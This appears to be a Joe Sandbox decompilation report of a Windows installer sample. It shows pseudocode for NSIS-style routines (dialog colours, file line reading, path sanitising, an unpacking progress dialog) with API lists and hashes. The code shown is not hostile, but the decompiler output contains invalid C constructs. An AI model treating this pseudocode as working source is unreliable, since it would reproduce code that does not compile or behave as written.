                                                          • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                                          • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                                          • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                          				struct tagLOGBRUSH _v16;
                                                          				long _t39;
                                                          				long _t41;
                                                          				void* _t44;
                                                          				signed char _t50;
                                                          				long* _t54;
                                                          
                                                          				if(_a4 + 0xfffffecd > 5) {
                                                          					L18:
                                                          					return 0;
                                                          				}
                                                          				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                          				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                          					goto L18;
                                                          				} else {
                                                          					_t50 = _t54[5];
                                                          					if((_t50 & 0xffffffe0) != 0) {
                                                          						goto L18;
                                                          					}
                                                          					_t39 =  *_t54;
                                                          					if((_t50 & 0x00000002) != 0) {
                                                          						_t39 = GetSysColor(_t39);
                                                          					}
                                                          					if((_t54[5] & 0x00000001) != 0) {
                                                          						SetTextColor(_a8, _t39);
                                                          					}
                                                          					SetBkMode(_a8, _t54[4]);
                                                          					_t41 = _t54[1];
                                                          					_v16.lbColor = _t41;
                                                          					if((_t54[5] & 0x00000008) != 0) {
                                                          						_t41 = GetSysColor(_t41);
                                                          						_v16.lbColor = _t41;
                                                          					}
                                                          					if((_t54[5] & 0x00000004) != 0) {
                                                          						SetBkColor(_a8, _t41);
                                                          					}
                                                          					if((_t54[5] & 0x00000010) != 0) {
                                                          						_v16.lbStyle = _t54[2];
                                                          						_t44 = _t54[3];
                                                          						if(_t44 != 0) {
                                                          							DeleteObject(_t44);
                                                          						}
                                                          						_t54[3] = CreateBrushIndirect( &_v16);
                                                          					}
                                                          					return _t54[3];
                                                          				}
                                                          			}









                                                          0x0040463d
                                                          0x004046f3
                                                          0x00000000
                                                          0x004046f3
                                                          0x0040464e
                                                          0x00404652
                                                          0x00000000
                                                          0x0040466c
                                                          0x0040466c
                                                          0x00404675
                                                          0x00000000
                                                          0x00000000
                                                          0x00404677
                                                          0x00404683
                                                          0x00404686
                                                          0x00404686
                                                          0x0040468c
                                                          0x00404692
                                                          0x00404692
                                                          0x0040469e
                                                          0x004046a4
                                                          0x004046ab
                                                          0x004046ae
                                                          0x004046b1
                                                          0x004046b3
                                                          0x004046b3
                                                          0x004046bb
                                                          0x004046c1
                                                          0x004046c1
                                                          0x004046cb
                                                          0x004046d0
                                                          0x004046d3
                                                          0x004046d8
                                                          0x004046db
                                                          0x004046db
                                                          0x004046eb
                                                          0x004046eb
                                                          0x00000000
                                                          0x004046ee

                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                          • GetSysColor.USER32(00000000), ref: 00404686
                                                          • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                          • SetBkMode.GDI32(?,?), ref: 0040469E
                                                          • GetSysColor.USER32(?), ref: 004046B1
                                                          • SetBkColor.GDI32(?,?), ref: 004046C1
                                                          • DeleteObject.GDI32(?), ref: 004046DB
                                                          • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                          • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                          • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                          • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 87%
                                                          			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                          				intOrPtr _t65;
                                                          				intOrPtr _t66;
                                                          				intOrPtr _t72;
                                                          				void* _t76;
                                                          				void* _t79;
                                                          
                                                          				_t72 = __edx;
                                                          				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                          				_t65 = 2;
                                                          				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                          				_t66 = E00402D84(_t65);
                                                          				_t79 = _t66 - 1;
                                                          				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                          				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                          				if(_t79 < 0) {
                                                          					L36:
                                                          					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
                                                          				} else {
                                                          					__ecx = 0x3ff;
                                                          					if(__eax > 0x3ff) {
                                                          						 *(__ebp - 0x44) = 0x3ff;
                                                          					}
                                                          					if( *__edi == __bx) {
                                                          						L34:
                                                          						__ecx =  *(__ebp - 0xc);
                                                          						__eax =  *(__ebp - 8);
                                                          						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                          						if(_t79 == 0) {
                                                          							 *(_t76 - 4) = 1;
                                                          						}
                                                          						goto L36;
                                                          					} else {
                                                          						 *(__ebp - 0x38) = __ebx;
                                                          						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
                                                          						if( *(__ebp - 0x44) > __ebx) {
                                                          							do {
                                                          								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                          									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
                                                          										__eax = __ebp - 0x50;
                                                          										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                          											goto L34;
                                                          										} else {
                                                          											goto L21;
                                                          										}
                                                          									} else {
                                                          										goto L34;
                                                          									}
                                                          								} else {
                                                          									__eax = __ebp - 0x40;
                                                          									_push(__ebx);
                                                          									_push(__ebp - 0x40);
                                                          									__eax = 2;
                                                          									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                          									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                                          									if(__eax == 0) {
                                                          										goto L34;
                                                          									} else {
                                                          										__ecx =  *(__ebp - 0x40);
                                                          										if(__ecx == __ebx) {
                                                          											goto L34;
                                                          										} else {
                                                          											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                          											 *(__ebp - 0x4c) = __ecx;
                                                          											 *(__ebp - 0x50) = __eax;
                                                          											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                          												L28:
                                                          												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                          											} else {
                                                          												__ebp - 0x50 = __ebp + 0xa;
                                                          												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                          													L21:
                                                          													__eax =  *(__ebp - 0x50);
                                                          												} else {
                                                          													__edi =  *(__ebp - 0x4c);
                                                          													__edi =  ~( *(__ebp - 0x4c));
                                                          													while(1) {
                                                          														_t22 = __ebp - 0x40;
                                                          														 *_t22 =  *(__ebp - 0x40) - 1;
                                                          														__eax = 0xfffd;
                                                          														 *(__ebp - 0x50) = 0xfffd;
                                                          														if( *_t22 == 0) {
                                                          															goto L22;
                                                          														}
                                                          														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                          														__edi = __edi + 1;
                                                          														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                                          														__eax = __ebp + 0xa;
                                                          														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                          															continue;
                                                          														} else {
                                                          															goto L21;
                                                          														}
                                                          														goto L22;
                                                          													}
                                                          												}
                                                          												L22:
                                                          												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                          													goto L28;
                                                          												} else {
                                                          													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                          														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                          															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                          															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                          														} else {
                                                          															__ecx =  *(__ebp - 0xc);
                                                          															__edx =  *(__ebp - 8);
                                                          															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                          															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                          														}
                                                          														goto L34;
                                                          													} else {
                                                          														__ecx =  *(__ebp - 0xc);
                                                          														__edx =  *(__ebp - 8);
                                                          														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                          														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                          														 *(__ebp - 0x38) = __eax;
                                                          														if(__ax == __bx) {
                                                          															goto L34;
                                                          														} else {
                                                          															goto L26;
                                                          														}
                                                          													}
                                                          												}
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          								goto L37;
                                                          								L26:
                                                          								__eax =  *(__ebp - 8);
                                                          							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                          						}
                                                          						goto L34;
                                                          					}
                                                          				}
                                                          				L37:
                                                          				return 0;
                                                          			}








                                                          0x004026ec
                                                          0x004026ee
                                                          0x004026f1
                                                          0x004026f3
                                                          0x004026f6
                                                          0x004026fb
                                                          0x004026ff
                                                          0x00402702
                                                          0x00402705
                                                          0x00402c2a
                                                          0x00402c2d
                                                          0x0040270b
                                                          0x0040270b
                                                          0x00402712
                                                          0x00402714
                                                          0x00402714
                                                          0x0040271a
                                                          0x0040287e
                                                          0x0040287e
                                                          0x00402881
                                                          0x00402886
                                                          0x004015b6
                                                          0x0040292e
                                                          0x0040292e
                                                          0x00000000
                                                          0x00402720
                                                          0x00402721
                                                          0x0040272c
                                                          0x0040272f
                                                          0x0040273b
                                                          0x0040273f
                                                          0x004027d7
                                                          0x004027ef
                                                          0x004027ff
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402745
                                                          0x00402745
                                                          0x00402748
                                                          0x00402749
                                                          0x0040274c
                                                          0x00402751
                                                          0x00402758
                                                          0x00402760
                                                          0x00000000
                                                          0x00402766
                                                          0x00402766
                                                          0x0040276b
                                                          0x00000000
                                                          0x00402771
                                                          0x00402771
                                                          0x00402779
                                                          0x0040277c
                                                          0x0040277f
                                                          0x0040283a
                                                          0x00402841
                                                          0x00402785
                                                          0x0040278b
                                                          0x00402797
                                                          0x00402801
                                                          0x00402801
                                                          0x00402799
                                                          0x00402799
                                                          0x0040279c
                                                          0x0040279e
                                                          0x0040279e
                                                          0x0040279e
                                                          0x004027a1
                                                          0x004027a6
                                                          0x004027a9
                                                          0x00000000
                                                          0x00000000
                                                          0x004027ab
                                                          0x004027ae
                                                          0x004027bc
                                                          0x004027c2
                                                          0x004027d0
                                                          0x00000000
                                                          0x004027d2
                                                          0x00000000
                                                          0x004027d2
                                                          0x00000000
                                                          0x004027d0
                                                          0x0040279e
                                                          0x00402804
                                                          0x00402807
                                                          0x00000000
                                                          0x00402809
                                                          0x0040280e
                                                          0x0040284f
                                                          0x00402871
                                                          0x00402878
                                                          0x0040285d
                                                          0x0040285d
                                                          0x00402860
                                                          0x00402863
                                                          0x00402866
                                                          0x00402866
                                                          0x00000000
                                                          0x00402817
                                                          0x00402817
                                                          0x0040281a
                                                          0x0040281d
                                                          0x00402823
                                                          0x00402827
                                                          0x0040282a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040282a
                                                          0x0040280e
                                                          0x00402807
                                                          0x0040277f
                                                          0x0040276b
                                                          0x00402760
                                                          0x00000000
                                                          0x0040282c
                                                          0x0040282c
                                                          0x0040282f
                                                          0x00402838
                                                          0x00000000
                                                          0x0040272f
                                                          0x0040271a
                                                          0x00402c33
                                                          0x00402c39

                                                          APIs
                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                            • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                          • String ID: 9
                                                          • API String ID: 163830602-2366072709
                                                          • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                          • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                          • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                          • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 91%
                                                          			E004068EF(WCHAR* _a4) {
                                                          				short _t5;
                                                          				short _t7;
                                                          				WCHAR* _t19;
                                                          				WCHAR* _t20;
                                                          				WCHAR* _t21;
                                                          
                                                          				_t20 = _a4;
                                                          				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                          					_t20 =  &(_t20[4]);
                                                          				}
                                                          				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
                                                          					_t20 =  &(_t20[2]);
                                                          				}
                                                          				_t5 =  *_t20;
                                                          				_t21 = _t20;
                                                          				_t19 = _t20;
                                                          				if(_t5 != 0) {
                                                          					do {
                                                          						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
                                                          							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                          							_t19 = CharNextW(_t19);
                                                          						}
                                                          						_t20 = CharNextW(_t20);
                                                          						_t5 =  *_t20;
                                                          					} while (_t5 != 0);
                                                          				}
                                                          				 *_t19 =  *_t19 & 0x00000000;
                                                          				while(1) {
                                                          					_push(_t19);
                                                          					_push(_t21);
                                                          					_t19 = CharPrevW();
                                                          					_t7 =  *_t19;
                                                          					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                          						break;
                                                          					}
                                                          					 *_t19 =  *_t19 & 0x00000000;
                                                          					if(_t21 < _t19) {
                                                          						continue;
                                                          					}
                                                          					break;
                                                          				}
                                                          				return _t7;
                                                          			}








                                                          0x004068f1
                                                          0x004068fa
                                                          0x00406911
                                                          0x00406911
                                                          0x00406918
                                                          0x00406924
                                                          0x00406924
                                                          0x00406927
                                                          0x0040692a
                                                          0x0040692f
                                                          0x00406931
                                                          0x0040693a
                                                          0x0040693e
                                                          0x0040695b
                                                          0x00406963
                                                          0x00406963
                                                          0x00406968
                                                          0x0040696a
                                                          0x0040696d
                                                          0x00406972
                                                          0x00406973
                                                          0x00406977
                                                          0x00406977
                                                          0x00406978
                                                          0x0040697f
                                                          0x00406981
                                                          0x00406988
                                                          0x00000000
                                                          0x00000000
                                                          0x00406990
                                                          0x00406996
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406996
                                                          0x0040699b

                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                          • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                          • CharNextW.USER32(?,00000000,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                          • CharPrevW.USER32(?,?,766DFAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-1201062745
                                                          • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                          • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                          • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                          • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040302E(intOrPtr _a4) {
                                                          				short _v132;
                                                          				long _t6;
                                                          				struct HWND__* _t7;
                                                          				struct HWND__* _t15;
                                                          
                                                          				if(_a4 != 0) {
                                                          					_t15 =  *0x420efc;
                                                          					if(_t15 != 0) {
                                                          						_t15 = DestroyWindow(_t15);
                                                          					}
                                                          					 *0x420efc = 0;
                                                          					return _t15;
                                                          				}
                                                          				if( *0x420efc != 0) {
                                                          					return E00406A71(0);
                                                          				}
                                                          				_t6 = GetTickCount();
                                                          				if(_t6 >  *0x42a26c) {
                                                          					if( *0x42a268 == 0) {
                                                          						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
                                                          						 *0x420efc = _t7;
                                                          						return ShowWindow(_t7, 5);
                                                          					}
                                                          					if(( *0x42a314 & 0x00000001) != 0) {
                                                          						wsprintfW( &_v132, L"... %d%%", E00403012());
                                                          						return E004056CA(0,  &_v132);
                                                          					}
                                                          				}
                                                          				return _t6;
                                                          			}







                                                          0x0040303d
                                                          0x0040303f
                                                          0x00403046
                                                          0x00403049
                                                          0x00403049
                                                          0x0040304f
                                                          0x00000000
                                                          0x0040304f
                                                          0x0040305d
                                                          0x00000000
                                                          0x00403060
                                                          0x00403067
                                                          0x00403073
                                                          0x0040307b
                                                          0x004030b9
                                                          0x004030c2
                                                          0x00000000
                                                          0x004030c7
                                                          0x00403084
                                                          0x00403095
                                                          0x00000000
                                                          0x004030a3
                                                          0x00403084
                                                          0x004030cf

                                                          APIs
                                                          • DestroyWindow.USER32(?,00000000), ref: 00403049
                                                          • GetTickCount.KERNEL32 ref: 00403067
                                                          • wsprintfW.USER32 ref: 00403095
                                                            • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                            • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                            • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                            • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                          • CreateDialogParamW.USER32 ref: 004030B9
                                                          • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                            • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                          • String ID: ... %d%%
                                                          • API String ID: 722711167-2449383134
                                                          • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                          • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                          • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                          • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
                                                          				long _v8;
                                                          				signed char _v12;
                                                          				unsigned int _v16;
                                                          				void* _v20;
                                                          				intOrPtr _v24;
                                                          				long _v56;
                                                          				void* _v60;
                                                          				long _t15;
                                                          				unsigned int _t19;
                                                          				signed int _t25;
                                                          				struct HWND__* _t28;
                                                          
                                                          				_t28 = _a4;
                                                          				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                          				if(_a8 == 0) {
                                                          					L4:
                                                          					_v56 = _t15;
                                                          					_v60 = 4;
                                                          					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                          					return _v24;
                                                          				}
                                                          				_t19 = GetMessagePos();
                                                          				_v16 = _t19 >> 0x10;
                                                          				_v20 = _t19;
                                                          				ScreenToClient(_t28,  &_v20);
                                                          				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                          				if((_v12 & 0x00000066) != 0) {
                                                          					_t15 = _v8;
                                                          					goto L4;
                                                          				}
                                                          				return _t25 | 0xffffffff;
                                                          			}














                                                          0x00404f8d
                                                          0x00404f9a
                                                          0x00404fa0
                                                          0x00404fde
                                                          0x00404fde
                                                          0x00404fed
                                                          0x00404ff4
                                                          0x00000000
                                                          0x00404ff6
                                                          0x00404fa2
                                                          0x00404fb1
                                                          0x00404fb9
                                                          0x00404fbc
                                                          0x00404fce
                                                          0x00404fd4
                                                          0x00404fdb
                                                          0x00000000
                                                          0x00404fdb
                                                          0x00000000

                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                          • GetMessagePos.USER32 ref: 00404FA2
                                                          • ScreenToClient.USER32 ref: 00404FBC
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                          • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                          • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                          • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                          				short _v132;
                                                          				void* _t11;
                                                          				WCHAR* _t19;
                                                          
                                                          				if(_a8 == 0x110) {
                                                          					SetTimer(_a4, 1, 0xfa, 0);
                                                          					_a8 = 0x113;
                                                          				}
                                                          				if(_a8 == 0x113) {
                                                          					_t11 = E00403012();
                                                          					_t19 = L"unpacking data: %d%%";
                                                          					if( *0x42a270 == 0) {
